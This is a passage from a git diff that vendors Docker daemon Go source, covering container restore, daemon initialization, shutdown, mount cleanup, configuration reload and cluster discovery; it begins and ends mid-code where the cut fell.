daemon.waitForNetworks(c) + if err := daemon.containerStart(c, "", "", true); err != nil { + logrus.Errorf("Failed to start container %s: %s", c.ID, err) + } + close(chNotify) + }(c, notifier) + + } + group.Wait() + + removeGroup := sync.WaitGroup{} + for id := range removeContainers { + removeGroup.Add(1) + go func(cid string) { + if err := daemon.ContainerRm(cid, &types.ContainerRmConfig{ForceRemove: true, RemoveVolume: true}); err != nil { + logrus.Errorf("Failed to remove container %s: %s", cid, err) + } + removeGroup.Done() + }(id) + } + removeGroup.Wait() + + // any containers that were started above would already have had this done, + // however we need to now prepare the mountpoints for the rest of the containers as well. + // This shouldn't cause any issue running on the containers that already had this run. + // This must be run after any containers with a restart policy so that containerized plugins + // can have a chance to be running before we try to initialize them. + for _, c := range containers { + // if the container has restart policy, do not + // prepare the mountpoints since it has been done on restarting. + // This is to speed up the daemon start when a restart container + // has a volume and the volume dirver is not available. + if _, ok := restartContainers[c]; ok { + continue + } else if _, ok := removeContainers[c.ID]; ok { + // container is automatically removed, skip it. + continue + } + + group.Add(1) + go func(c *container.Container) { + defer group.Done() + if err := daemon.prepareMountPoints(c); err != nil { + logrus.Error(err) + } + }(c) + } + + group.Wait() + + logrus.Info("Loading containers: done.") + + return nil +} + +// RestartSwarmContainers restarts any autostart container which has a +// swarm endpoint. +func (daemon *Daemon) RestartSwarmContainers() { + group := sync.WaitGroup{} + for _, c := range daemon.List() { + if !c.IsRunning() && !c.IsPaused() { + // Autostart all the containers which has a + // swarm endpoint now that the cluster is + // initialized. + if daemon.configStore.AutoRestart && c.ShouldRestart() && c.NetworkSettings.HasSwarmEndpoint { + group.Add(1) + go func(c *container.Container) { + defer group.Done() + if err := daemon.containerStart(c, "", "", true); err != nil { + logrus.Error(err) + } + }(c) + } + } + + } + group.Wait() +} + +// waitForNetworks is used during daemon initialization when starting up containers +// It ensures that all of a container's networks are available before the daemon tries to start the container. +// In practice it just makes sure the discovery service is available for containers which use a network that require discovery. +func (daemon *Daemon) waitForNetworks(c *container.Container) { + if daemon.discoveryWatcher == nil { + return + } + // Make sure if the container has a network that requires discovery that the discovery service is available before starting + for netName := range c.NetworkSettings.Networks { + // If we get `ErrNoSuchNetwork` here, we can assume that it is due to discovery not being ready + // Most likely this is because the K/V store used for discovery is in a container and needs to be started + if _, err := daemon.netController.NetworkByName(netName); err != nil { + if _, ok := err.(libnetwork.ErrNoSuchNetwork); !ok { + continue + } + // use a longish timeout here due to some slowdowns in libnetwork if the k/v store is on anything other than --net=host + // FIXME: why is this slow??? + logrus.Debugf("Container %s waiting for network to be ready", c.Name) + select { + case <-daemon.discoveryWatcher.ReadyCh(): + case <-time.After(60 * time.Second): + } + return + } + } +} + +func (daemon *Daemon) children(c *container.Container) map[string]*container.Container { + return daemon.linkIndex.children(c) +} + +// parents returns the names of the parent containers of the container +// with the given name. +func (daemon *Daemon) parents(c *container.Container) map[string]*container.Container { + return daemon.linkIndex.parents(c) +} + +func (daemon *Daemon) registerLink(parent, child *container.Container, alias string) error { + fullName := path.Join(parent.Name, alias) + if err := daemon.nameIndex.Reserve(fullName, child.ID); err != nil { + if err == registrar.ErrNameReserved { + logrus.Warnf("error registering link for %s, to %s, as alias %s, ignoring: %v", parent.ID, child.ID, alias, err) + return nil + } + return err + } + daemon.linkIndex.link(parent, child, fullName) + return nil +} + +// DaemonJoinsCluster informs the daemon has joined the cluster and provides +// the handler to query the cluster component +func (daemon *Daemon) DaemonJoinsCluster(clusterProvider cluster.Provider) { + daemon.setClusterProvider(clusterProvider) +} + +// DaemonLeavesCluster informs the daemon has left the cluster +func (daemon *Daemon) DaemonLeavesCluster() { + // Daemon is in charge of removing the attachable networks with + // connected containers when the node leaves the swarm + daemon.clearAttachableNetworks() + daemon.setClusterProvider(nil) +} + +// setClusterProvider sets a component for querying the current cluster state. +func (daemon *Daemon) setClusterProvider(clusterProvider cluster.Provider) { + daemon.clusterProvider = clusterProvider + // call this in a goroutine to allow netcontroller handle this event async + // and not block if it is in the middle of talking with cluster + go daemon.netController.SetClusterProvider(clusterProvider) +} + +// IsSwarmCompatible verifies if the current daemon +// configuration is compatible with the swarm mode +func (daemon *Daemon) IsSwarmCompatible() error { + if daemon.configStore == nil { + return nil + } + return daemon.configStore.isSwarmCompatible() +} + +// NewDaemon sets up everything for the daemon to be able to service +// requests from the webserver. +func NewDaemon(config *Config, registryService registry.Service, containerdRemote libcontainerd.Remote) (daemon *Daemon, err error) { + setDefaultMtu(config) + + // Ensure that we have a correct root key limit for launching containers. + if err := ModifyRootKeyLimit(); err != nil { + logrus.Warnf("unable to modify root key limit, number of containers could be limited by this quota: %v", err) + } + + // Ensure we have compatible and valid configuration options + if err := verifyDaemonSettings(config); err != nil { + return nil, err + } + + // Do we have a disabled network? + config.DisableBridge = isBridgeNetworkDisabled(config) + + // Verify the platform is supported as a daemon + if !platformSupported { + return nil, errSystemNotSupported + } + + // Validate platform-specific requirements + if err := checkSystem(); err != nil { + return nil, err + } + + uidMaps, gidMaps, err := setupRemappedRoot(config) + if err != nil { + return nil, err + } + rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) + if err != nil { + return nil, err + } + + if err := setupDaemonProcess(config); err != nil { + return nil, err + } + + // set up the tmpDir to use a canonical path + tmp, err := tempDir(config.Root, rootUID, rootGID) + if err != nil { + return nil, fmt.Errorf("Unable to get the TempDir under %s: %s", config.Root, err) + } + realTmp, err := fileutils.ReadSymlinkedDirectory(tmp) + if err != nil { + return nil, fmt.Errorf("Unable to get the full path to the TempDir (%s): %s", tmp, err) + } + os.Setenv("TMPDIR", realTmp) + + d := &Daemon{configStore: config} + // Ensure the daemon is properly shutdown if there is a failure during + // initialization + defer func() { + if err != nil { + if err := d.Shutdown(); err != nil { + logrus.Error(err) + } + } + }() + + if err := d.setupSeccompProfile(); err != nil { + return nil, err + } + + // Set the default isolation mode (only applicable on Windows) + if err := d.setDefaultIsolation(); err != nil { + return nil, fmt.Errorf("error setting default isolation mode: %v", err) + } + + logrus.Debugf("Using default logging driver %s", config.LogConfig.Type) + + if err := configureMaxThreads(config); err != nil { + logrus.Warnf("Failed to configure golang's threads limit: %v", err) + } + + if err := ensureDefaultAppArmorProfile(); err != nil { + logrus.Errorf(err.Error()) + } + + daemonRepo := filepath.Join(config.Root, "containers") + if err := idtools.MkdirAllAs(daemonRepo, 0700, rootUID, rootGID); err != nil && !os.IsExist(err) { + return nil, err + } + + if runtime.GOOS == "windows" { + if err := system.MkdirAll(filepath.Join(config.Root, "credentialspecs"), 0); err != nil && !os.IsExist(err) { + return nil, err + } + } + + driverName := os.Getenv("DOCKER_DRIVER") + if driverName == "" { + driverName = config.GraphDriver + } + + d.RegistryService = registryService + d.PluginStore = plugin.NewStore(config.Root) // todo: remove + // Plugin system initialization should happen before restore. Do not change order. + d.pluginManager, err = plugin.NewManager(plugin.ManagerConfig{ + Root: filepath.Join(config.Root, "plugins"), + ExecRoot: "/run/docker/plugins", // possibly needs fixing + Store: d.PluginStore, + Executor: containerdRemote, + RegistryService: registryService, + LiveRestoreEnabled: config.LiveRestoreEnabled, + LogPluginEvent: d.LogPluginEvent, // todo: make private + }) + if err != nil { + return nil, errors.Wrap(err, "couldn't create plugin manager") + } + + d.layerStore, err = layer.NewStoreFromOptions(layer.StoreOptions{ + StorePath: config.Root, + MetadataStorePathTemplate: filepath.Join(config.Root, "image", "%s", "layerdb"), + GraphDriver: driverName, + GraphDriverOptions: config.GraphOptions, + UIDMaps: uidMaps, + GIDMaps: gidMaps, + PluginGetter: d.PluginStore, + ExperimentalEnabled: config.Experimental, + }) + if err != nil { + return nil, err + } + + graphDriver := d.layerStore.DriverName() + imageRoot := filepath.Join(config.Root, "image", graphDriver) + + // Configure and validate the kernels security support + if err := configureKernelSecuritySupport(config, graphDriver); err != nil { + return nil, err + } + + logrus.Debugf("Max Concurrent Downloads: %d", *config.MaxConcurrentDownloads) + d.downloadManager = xfer.NewLayerDownloadManager(d.layerStore, *config.MaxConcurrentDownloads) + logrus.Debugf("Max Concurrent Uploads: %d", *config.MaxConcurrentUploads) + d.uploadManager = xfer.NewLayerUploadManager(*config.MaxConcurrentUploads) + + ifs, err := image.NewFSStoreBackend(filepath.Join(imageRoot, "imagedb")) + if err != nil { + return nil, err + } + + d.imageStore, err = image.NewImageStore(ifs, d.layerStore) + if err != nil { + return nil, err + } + + // Configure the volumes driver + volStore, err := d.configureVolumes(rootUID, rootGID) + if err != nil { + return nil, err + } + + trustKey, err := api.LoadOrCreateTrustKey(config.TrustKeyPath) + if err != nil { + return nil, err + } + + trustDir := filepath.Join(config.Root, "trust") + + if err := system.MkdirAll(trustDir, 0700); err != nil { + return nil, err + } + + distributionMetadataStore, err := dmetadata.NewFSMetadataStore(filepath.Join(imageRoot, "distribution")) + if err != nil { + return nil, err + } + + eventsService := events.New() + + referenceStore, err := reference.NewReferenceStore(filepath.Join(imageRoot, "repositories.json")) + if err != nil { + return nil, fmt.Errorf("Couldn't create Tag store repositories: %s", err) + } + + migrationStart := time.Now() + if err := v1.Migrate(config.Root, graphDriver, d.layerStore, d.imageStore, referenceStore, distributionMetadataStore); err != nil { + logrus.Errorf("Graph migration failed: %q. Your old graph data was found to be too inconsistent for upgrading to content-addressable storage. Some of the old data was probably not upgraded. We recommend starting over with a clean storage directory if possible.", err) + } + logrus.Infof("Graph migration to content-addressability took %.2f seconds", time.Since(migrationStart).Seconds()) + + // Discovery is only enabled when the daemon is launched with an address to advertise. When + // initialized, the daemon is registered and we can store the discovery backend as its read-only + if err := d.initDiscovery(config); err != nil { + return nil, err + } + + sysInfo := sysinfo.New(false) + // Check if Devices cgroup is mounted, it is hard requirement for container security, + // on Linux. + if runtime.GOOS == "linux" && !sysInfo.CgroupDevicesEnabled { + return nil, fmt.Errorf("Devices cgroup isn't mounted") + } + + d.ID = trustKey.PublicKey().KeyID() + d.repository = daemonRepo + d.containers = container.NewMemoryStore() + d.execCommands = exec.NewStore() + d.referenceStore = referenceStore + d.distributionMetadataStore = distributionMetadataStore + d.trustKey = trustKey + d.idIndex = truncindex.NewTruncIndex([]string{}) + d.statsCollector = d.newStatsCollector(1 * time.Second) + d.defaultLogConfig = containertypes.LogConfig{ + Type: config.LogConfig.Type, + Config: config.LogConfig.Config, + } + d.EventsService = eventsService + d.volumes = volStore + d.root = config.Root + d.uidMaps = uidMaps + d.gidMaps = gidMaps + d.seccompEnabled = sysInfo.Seccomp + + d.nameIndex = registrar.NewRegistrar() + d.linkIndex = newLinkIndex() + d.containerdRemote = containerdRemote + + go d.execCommandGC() + + d.containerd, err = containerdRemote.Client(d) + if err != nil { + return nil, err + } + + if err := d.restore(); err != nil { + return nil, err + } + + // FIXME: this method never returns an error + info, _ := d.SystemInfo() + + engineVersion.WithValues( + dockerversion.Version, + dockerversion.GitCommit, + info.Architecture, + info.Driver, + info.KernelVersion, + info.OperatingSystem, + ).Set(1) + engineCpus.Set(float64(info.NCPU)) + engineMemory.Set(float64(info.MemTotal)) + + // set up SIGUSR1 handler on Unix-like systems, or a Win32 global event + // on Windows to dump Go routine stacks + stackDumpDir := config.Root + if execRoot := config.GetExecRoot(); execRoot != "" { + stackDumpDir = execRoot + } + d.setupDumpStackTrap(stackDumpDir) + + return d, nil +} + +func (daemon *Daemon) shutdownContainer(c *container.Container) error { + stopTimeout := c.StopTimeout() + // TODO(windows): Handle docker restart with paused containers + if c.IsPaused() { + // To terminate a process in freezer cgroup, we should send + // SIGTERM to this process then unfreeze it, and the process will + // force to terminate immediately. + logrus.Debugf("Found container %s is paused, sending SIGTERM before unpausing it", c.ID) + sig, ok := signal.SignalMap["TERM"] + if !ok { + return fmt.Errorf("System does not support SIGTERM") + } + if err := daemon.kill(c, int(sig)); err != nil { + return fmt.Errorf("sending SIGTERM to container %s with error: %v", c.ID, err) + } + if err := daemon.containerUnpause(c); err != nil { + return fmt.Errorf("Failed to unpause container %s with error: %v", c.ID, err) + } + if _, err := c.WaitStop(time.Duration(stopTimeout) * time.Second); err != nil { + logrus.Debugf("container %s failed to exit in %d second of SIGTERM, sending SIGKILL to force", c.ID, stopTimeout) + sig, ok := signal.SignalMap["KILL"] + if !ok { + return fmt.Errorf("System does not support SIGKILL") + } + if err := daemon.kill(c, int(sig)); err != nil { + logrus.Errorf("Failed to SIGKILL container %s", c.ID) + } + c.WaitStop(-1 * time.Second) + return err + } + } + // If container failed to exit in stopTimeout seconds of SIGTERM, then using the force + if err := daemon.containerStop(c, stopTimeout); err != nil { + return fmt.Errorf("Failed to stop container %s with error: %v", c.ID, err) + } + + c.WaitStop(-1 * time.Second) + return nil +} + +// ShutdownTimeout returns the shutdown timeout based on the max stopTimeout of the containers, +// and is limited by daemon's ShutdownTimeout. +func (daemon *Daemon) ShutdownTimeout() int { + // By default we use daemon's ShutdownTimeout. + shutdownTimeout := daemon.configStore.ShutdownTimeout + + graceTimeout := 5 + if daemon.containers != nil { + for _, c := range daemon.containers.List() { + if shutdownTimeout >= 0 { + stopTimeout := c.StopTimeout() + if stopTimeout < 0 { + shutdownTimeout = -1 + } else { + if stopTimeout+graceTimeout > shutdownTimeout { + shutdownTimeout = stopTimeout + graceTimeout + } + } + } + } + } + return shutdownTimeout +} + +// Shutdown stops the daemon. +func (daemon *Daemon) Shutdown() error { + daemon.shutdown = true + // Keep mounts and networking running on daemon shutdown if + // we are to keep containers running and restore them. + + if daemon.configStore.LiveRestoreEnabled && daemon.containers != nil { + // check if there are any running containers, if none we should do some cleanup + if ls, err := daemon.Containers(&types.ContainerListOptions{}); len(ls) != 0 || err != nil { + return nil + } + } + + if daemon.containers != nil { + logrus.Debugf("start clean shutdown of all containers with a %d seconds timeout...", daemon.configStore.ShutdownTimeout) + daemon.containers.ApplyAll(func(c *container.Container) { + if !c.IsRunning() { + return + } + logrus.Debugf("stopping %s", c.ID) + if err := daemon.shutdownContainer(c); err != nil { + logrus.Errorf("Stop container error: %v", err) + return + } + if mountid, err := daemon.layerStore.GetMountID(c.ID); err == nil { + daemon.cleanupMountsByID(mountid) + } + logrus.Debugf("container stopped %s", c.ID) + }) + } + + if daemon.volumes != nil { + if err := daemon.volumes.Shutdown(); err != nil { + logrus.Errorf("Error shutting down volume store: %v", err) + } + } + + if daemon.layerStore != nil { + if err := daemon.layerStore.Cleanup(); err != nil { + logrus.Errorf("Error during layer Store.Cleanup(): %v", err) + } + } + + // Shutdown plugins after containers and layerstore. Don't change the order. + daemon.pluginShutdown() + + // trigger libnetwork Stop only if it's initialized + if daemon.netController != nil { + daemon.netController.Stop() + } + + if err := daemon.cleanupMounts(); err != nil { + return err + } + + return nil +} + +// Mount sets container.BaseFS +// (is it not set coming in? why is it unset?) +func (daemon *Daemon) Mount(container *container.Container) error { + dir, err := container.RWLayer.Mount(container.GetMountLabel()) + if err != nil { + return err + } + logrus.Debugf("container mounted via layerStore: %v", dir) + + if container.BaseFS != dir { + // The mount path reported by the graph driver should always be trusted on Windows, since the + // volume path for a given mounted layer may change over time. This should only be an error + // on non-Windows operating systems. + if container.BaseFS != "" && runtime.GOOS != "windows" { + daemon.Unmount(container) + return fmt.Errorf("Error: driver %s is returning inconsistent paths for container %s ('%s' then '%s')", + daemon.GraphDriverName(), container.ID, container.BaseFS, dir) + } + } + container.BaseFS = dir // TODO: combine these fields + return nil +} + +// Unmount unsets the container base filesystem +func (daemon *Daemon) Unmount(container *container.Container) error { + if err := container.RWLayer.Unmount(); err != nil { + logrus.Errorf("Error unmounting container %s: %s", container.ID, err) + return err + } + + return nil +} + +// V4Subnets returns the IPv4 subnets of networks that are managed by Docker. +func (daemon *Daemon) V4Subnets() []net.IPNet { + var subnets []net.IPNet + + managedNetworks := daemon.netController.Networks() + + for _, managedNetwork := range managedNetworks { + v4Infos, _ := managedNetwork.Info().IpamInfo() + for _, v4Info := range v4Infos { + if v4Info.IPAMData.Pool != nil { + subnets = append(subnets, *v4Info.IPAMData.Pool) + } + } + } + + return subnets +} + +// V6Subnets returns the IPv6 subnets of networks that are managed by Docker. +func (daemon *Daemon) V6Subnets() []net.IPNet { + var subnets []net.IPNet + + managedNetworks := daemon.netController.Networks() + + for _, managedNetwork := range managedNetworks { + _, v6Infos := managedNetwork.Info().IpamInfo() + for _, v6Info := range v6Infos { + if v6Info.IPAMData.Pool != nil { + subnets = append(subnets, *v6Info.IPAMData.Pool) + } + } + } + + return subnets +} + +// GraphDriverName returns the name of the graph driver used by the layer.Store +func (daemon *Daemon) GraphDriverName() string { + return daemon.layerStore.DriverName() +} + +// GetUIDGIDMaps returns the current daemon's user namespace settings +// for the full uid and gid maps which will be applied to containers +// started in this instance. +func (daemon *Daemon) GetUIDGIDMaps() ([]idtools.IDMap, []idtools.IDMap) { + return daemon.uidMaps, daemon.gidMaps +} + +// GetRemappedUIDGID returns the current daemon's uid and gid values +// if user namespaces are in use for this daemon instance. If not +// this function will return "real" root values of 0, 0. +func (daemon *Daemon) GetRemappedUIDGID() (int, int) { + uid, gid, _ := idtools.GetRootUIDGID(daemon.uidMaps, daemon.gidMaps) + return uid, gid +} + +// tempDir returns the default directory to use for temporary files. +func tempDir(rootDir string, rootUID, rootGID int) (string, error) { + var tmpDir string + if tmpDir = os.Getenv("DOCKER_TMPDIR"); tmpDir == "" { + tmpDir = filepath.Join(rootDir, "tmp") + } + return tmpDir, idtools.MkdirAllAs(tmpDir, 0700, rootUID, rootGID) +} + +func (daemon *Daemon) setupInitLayer(initPath string) error { + rootUID, rootGID := daemon.GetRemappedUIDGID() + return initlayer.Setup(initPath, rootUID, rootGID) +} + +func setDefaultMtu(config *Config) { + // do nothing if the config does not have the default 0 value. + if config.Mtu != 0 { + return + } + config.Mtu = defaultNetworkMtu +} + +func (daemon *Daemon) configureVolumes(rootUID, rootGID int) (*store.VolumeStore, error) { + volumesDriver, err := local.New(daemon.configStore.Root, rootUID, rootGID) + if err != nil { + return nil, err + } + + volumedrivers.RegisterPluginGetter(daemon.PluginStore) + + if !volumedrivers.Register(volumesDriver, volumesDriver.Name()) { + return nil, fmt.Errorf("local volume driver could not be registered") + } + return store.New(daemon.configStore.Root) +} + +// IsShuttingDown tells whether the daemon is shutting down or not +func (daemon *Daemon) IsShuttingDown() bool { + return daemon.shutdown +} + +// initDiscovery initializes the discovery watcher for this daemon. +func (daemon *Daemon) initDiscovery(config *Config) error { + advertise, err := parseClusterAdvertiseSettings(config.ClusterStore, config.ClusterAdvertise) + if err != nil { + if err == errDiscoveryDisabled { + return nil + } + return err + } + + config.ClusterAdvertise = advertise + discoveryWatcher, err := initDiscovery(config.ClusterStore, config.ClusterAdvertise, config.ClusterOpts) + if err != nil { + return fmt.Errorf("discovery initialization failed (%v)", err) + } + + daemon.discoveryWatcher = discoveryWatcher + return nil +} + +// Reload reads configuration changes and modifies the +// daemon according to those changes. +// These are the settings that Reload changes: +// - Daemon labels. +// - Daemon debug log level. +// - Daemon insecure registries. +// - Daemon max concurrent downloads +// - Daemon max concurrent uploads +// - Cluster discovery (reconfigure and restart). +// - Daemon live restore +// - Daemon shutdown timeout (in seconds). +func (daemon *Daemon) Reload(config *Config) (err error) { + + daemon.configStore.reloadLock.Lock() + + attributes := daemon.platformReload(config) + + defer func() { + // we're unlocking here, because + // LogDaemonEventWithAttributes() -> SystemInfo() -> GetAllRuntimes() + // holds that lock too. + daemon.configStore.reloadLock.Unlock() + if err == nil { + daemon.LogDaemonEventWithAttributes("reload", attributes) + } + }() + + if err := daemon.reloadClusterDiscovery(config); err != nil { + return err + } + + if config.IsValueSet("labels") { + daemon.configStore.Labels = config.Labels + } + if config.IsValueSet("debug") { + daemon.configStore.Debug = config.Debug + } + if config.IsValueSet("insecure-registries") { + daemon.configStore.InsecureRegistries = config.InsecureRegistries + if err := daemon.RegistryService.LoadInsecureRegistries(config.InsecureRegistries); err != nil { + return err + } + } + if config.IsValueSet("live-restore") { + daemon.configStore.LiveRestoreEnabled = config.LiveRestoreEnabled + if err := daemon.containerdRemote.UpdateOptions(libcontainerd.WithLiveRestore(config.LiveRestoreEnabled)); err != nil { + return err + } + } + + // If no value is set for max-concurrent-downloads we assume it is the default value + // We always "reset" as the cost is lightweight and easy to maintain. + if config.IsValueSet("max-concurrent-downloads") && config.MaxConcurrentDownloads != nil { + *daemon.configStore.MaxConcurrentDownloads = *config.MaxConcurrentDownloads + } else { + maxConcurrentDownloads := defaultMaxConcurrentDownloads + daemon.configStore.MaxConcurrentDownloads = &maxConcurrentDownloads + } + logrus.Debugf("Reset Max Concurrent Downloads: %d", *daemon.configStore.MaxConcurrentDownloads) + if daemon.downloadManager != nil { + daemon.downloadManager.SetConcurrency(*daemon.configStore.MaxConcurrentDownloads) + } + + // If no value is set for max-concurrent-upload we assume it is the default value + // We always "reset" as the cost is lightweight and easy to maintain. + if config.IsValueSet("max-concurrent-uploads") && config.MaxConcurrentUploads != nil { + *daemon.configStore.MaxConcurrentUploads = *config.MaxConcurrentUploads + } else { + maxConcurrentUploads := defaultMaxConcurrentUploads + daemon.configStore.MaxConcurrentUploads = &maxConcurrentUploads + } + logrus.Debugf("Reset Max Concurrent Uploads: %d", *daemon.configStore.MaxConcurrentUploads) + if daemon.uploadManager != nil { + daemon.uploadManager.SetConcurrency(*daemon.configStore.MaxConcurrentUploads) + } + + if config.IsValueSet("shutdown-timeout") { + daemon.configStore.ShutdownTimeout = config.ShutdownTimeout + logrus.Debugf("Reset Shutdown Timeout: %d", daemon.configStore.ShutdownTimeout) + } + + // We emit daemon reload event here with updatable configurations + attributes["debug"] = fmt.Sprintf("%t", daemon.configStore.Debug) + attributes["live-restore"] = fmt.Sprintf("%t", daemon.configStore.LiveRestoreEnabled) + + if daemon.configStore.InsecureRegistries != nil { + insecureRegistries, err := json.Marshal(daemon.configStore.InsecureRegistries) + if err != nil { + return err + } + attributes["insecure-registries"] = string(insecureRegistries) + } else { + attributes["insecure-registries"] = "[]" + } + + attributes["cluster-store"] = daemon.configStore.ClusterStore + if daemon.configStore.ClusterOpts != nil { + opts, err := json.Marshal(daemon.configStore.ClusterOpts) + if err != nil { + return err + } + attributes["cluster-store-opts"] = string(opts) + } else { + attributes["cluster-store-opts"] = "{}" + } + attributes["cluster-advertise"] = daemon.configStore.ClusterAdvertise + + if daemon.configStore.Labels != nil { + labels, err := json.Marshal(daemon.configStore.Labels) + if err != nil { + return err + } + attributes["labels"] = string(labels) + } else { + attributes["labels"] = "[]" + } + + attributes["max-concurrent-downloads"] = fmt.Sprintf("%d", *daemon.configStore.MaxConcurrentDownloads) + attributes["max-concurrent-uploads"] = fmt.Sprintf("%d", *daemon.configStore.MaxConcurrentUploads) + attributes["shutdown-timeout"] = fmt.Sprintf("%d", daemon.configStore.ShutdownTimeout) + + return nil +} + +func (daemon *Daemon) reloadClusterDiscovery(config *Config) error { + var err error + newAdvertise := daemon.configStore.ClusterAdvertise + newClusterStore := daemon.configStore.ClusterStore + if config.IsValueSet("cluster-advertise") { + if config.IsValueSet("cluster-store") { + newClusterStore = config.ClusterStore + } + newAdvertise, err = parseClusterAdvertiseSettings(newClusterStore, config.ClusterAdvertise) + if err != nil && err != errDiscoveryDisabled { + return err + } + } + + if daemon.clusterProvider != nil { + if err := config.isSwarmCompatible(); err != nil { + return err + } + } + + // check discovery modifications + if !modifiedDiscoverySettings(daemon.configStore, newAdvertise, newClusterStore, config.ClusterOpts) { + return nil + } + + // enable discovery for the first time if it was not previously enabled + if daemon.discoveryWatcher == nil { + discoveryWatcher, err := initDiscovery(newClusterStore, newAdvertise, config.ClusterOpts) + if err != nil { + return fmt.Errorf("discovery initialization failed (%v)", err) + } + daemon.discoveryWatcher = discoveryWatcher + } else { + if err == errDiscoveryDisabled { + // disable discovery if it was previously enabled and it's disabled now + daemon.discoveryWatcher.Stop() + } else { + // reload discovery + if err = daemon.discoveryWatcher.Reload(config.ClusterStore, newAdvertise, config.ClusterOpts); err != nil { + return err + } + } + } + + daemon.configStore.ClusterStore = newClusterStore + daemon.configStore.ClusterOpts = config.ClusterOpts + daemon.configStore.ClusterAdvertise = newAdvertise + + if daemon.netController == nil { + return nil + } + netOptions, err := daemon.networkOptions(daemon.configStore, daemon.PluginStore, nil) + if err != nil { + logrus.WithError(err).Warnf("failed to get options with network controller") + return nil + } + err = daemon.netController.ReloadConfiguration(netOptions...) + if err != nil { + logrus.Warnf("Failed to reload configuration with network controller: %v", err) + } + + return nil +} + +func isBridgeNetworkDisabled(config *Config) bool { + return config.bridgeConfig.Iface == disableNetworkBridge +} + +func (daemon *Daemon) networkOptions(dconfig *Config, pg plugingetter.PluginGetter, activeSandboxes map[string]interface{}) ([]nwconfig.Option, error) { + options := []nwconfig.Option{} + if dconfig == nil { + return options, nil + } + + options = append(options, nwconfig.OptionExperimental(dconfig.Experimental)) + options = append(options, nwconfig.OptionDataDir(dconfig.Root)) + options = append(options, nwconfig.OptionExecRoot(dconfig.GetExecRoot())) + + dd := runconfig.DefaultDaemonNetworkMode() + dn := runconfig.DefaultDaemonNetworkMode().NetworkName() + options = append(options, nwconfig.OptionDefaultDriver(string(dd))) + options = append(options, nwconfig.OptionDefaultNetwork(dn)) + + if strings.TrimSpace(dconfig.ClusterStore) != "" { + kv := strings.Split(dconfig.ClusterStore, "://") + if len(kv) != 2 { + return nil, fmt.Errorf("kv store daemon config must be of the form KV-PROVIDER://KV-URL") + } + options = append(options, nwconfig.OptionKVProvider(kv[0])) + options = append(options, nwconfig.OptionKVProviderURL(kv[1])) + } + if len(dconfig.ClusterOpts) > 0 { + options = append(options, nwconfig.OptionKVOpts(dconfig.ClusterOpts)) + } + + if daemon.discoveryWatcher != nil { + options = append(options, nwconfig.OptionDiscoveryWatcher(daemon.discoveryWatcher)) + } + + if dconfig.ClusterAdvertise != "" { + options = append(options, nwconfig.OptionDiscoveryAddress(dconfig.ClusterAdvertise)) + } + + options = append(options, nwconfig.OptionLabels(dconfig.Labels)) + options = append(options, driverOptions(dconfig)...) + + if daemon.configStore != nil && daemon.configStore.LiveRestoreEnabled && len(activeSandboxes) != 0 { + options = append(options, nwconfig.OptionActiveSandboxes(activeSandboxes)) + } + + if pg != nil { + options = append(options, nwconfig.OptionPluginGetter(pg)) + } + + return options, nil +} + +func copyBlkioEntry(entries []*containerd.BlkioStatsEntry) []types.BlkioStatEntry { + out := make([]types.BlkioStatEntry, len(entries)) + for i, re := range entries { + out[i] = types.BlkioStatEntry{ + Major: re.Major, + Minor: re.Minor, + Op: re.Op, + Value: re.Value, + } + } + return out +} + +// GetCluster returns the cluster +func (daemon *Daemon) GetCluster() Cluster { + return daemon.cluster +} + +// SetCluster sets the cluster +func (daemon *Daemon) SetCluster(cluster Cluster) { + daemon.cluster = cluster +} + +func (daemon *Daemon) pluginShutdown() { + manager := daemon.pluginManager + // Check for a valid manager object. In error conditions, daemon init can fail + // and shutdown called, before plugin manager is initialized. + if manager != nil { + manager.Shutdown() + } +} + +// PluginManager returns current pluginManager associated with the daemon +func (daemon *Daemon) PluginManager() *plugin.Manager { // set up before daemon to avoid this method + return daemon.pluginManager +} + +// PluginGetter returns current pluginStore associated with the daemon +func (daemon *Daemon) PluginGetter() *plugin.Store { + return daemon.PluginStore +} + +// CreateDaemonRoot creates the root for the daemon +func CreateDaemonRoot(config *Config) error { + // get the canonical path to the Docker root directory + var realRoot string + if _, err := os.Stat(config.Root); err != nil && os.IsNotExist(err) { + realRoot = config.Root + } else { + realRoot, err = fileutils.ReadSymlinkedDirectory(config.Root) + if err != nil { + return fmt.Errorf("Unable to get the full path to root (%s): %s", config.Root, err) + } + } + + uidMaps, gidMaps, err := setupRemappedRoot(config) + if err != nil { + return err + } + rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) + if err != nil { + return err + } + + if err := setupDaemonRoot(config, realRoot, rootUID, rootGID); err != nil { + return err + } + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/daemon_experimental.go b/vendor/github.com/docker/docker/daemon/daemon_experimental.go new file mode 100644 index 0000000000..fb0251d4af --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/daemon_experimental.go @@ -0,0 +1,7 @@ +package daemon + +import "github.com/docker/docker/api/types/container" + +func (daemon *Daemon) verifyExperimentalContainerSettings(hostConfig *container.HostConfig, config *container.Config) ([]string, error) { + return nil, nil +} diff --git a/vendor/github.com/docker/docker/daemon/daemon_linux.go b/vendor/github.com/docker/docker/daemon/daemon_linux.go new file mode 100644 index 0000000000..9bdf6e2b79 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/daemon_linux.go @@ -0,0 +1,80 @@ +package daemon + +import ( + "bufio" + "fmt" + "io" + "os" + "regexp" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/mount" +) + +func (daemon *Daemon) cleanupMountsByID(id string) error { + logrus.Debugf("Cleaning up old mountid %s: start.", id) + f, err := os.Open("/proc/self/mountinfo") + if err != nil { + return err + } + defer f.Close() + + return daemon.cleanupMountsFromReaderByID(f, id, mount.Unmount) +} + +func (daemon *Daemon) cleanupMountsFromReaderByID(reader io.Reader, id string, unmount func(target string) error) error { + if daemon.root == "" { + return nil + } + var errors []string + + regexps := getCleanPatterns(id) + sc := bufio.NewScanner(reader) + for sc.Scan() { + if fields := strings.Fields(sc.Text()); len(fields) >= 4 { + if mnt := fields[4]; strings.HasPrefix(mnt, daemon.root) { + for _, p := range regexps { + if p.MatchString(mnt) { + if err := unmount(mnt); err != nil { + logrus.Error(err) + errors = append(errors, err.Error()) + } + } + } + } + } + } + + if err := sc.Err(); err != nil { + return err + } + + if len(errors) > 0 { + return fmt.Errorf("Error cleaning up mounts:\n%v", strings.Join(errors, "\n")) + } + + logrus.Debugf("Cleaning up old mountid %v: done.", id) + return nil +} + +// cleanupMounts umounts shm/mqueue mounts for old containers +func (daemon *Daemon) 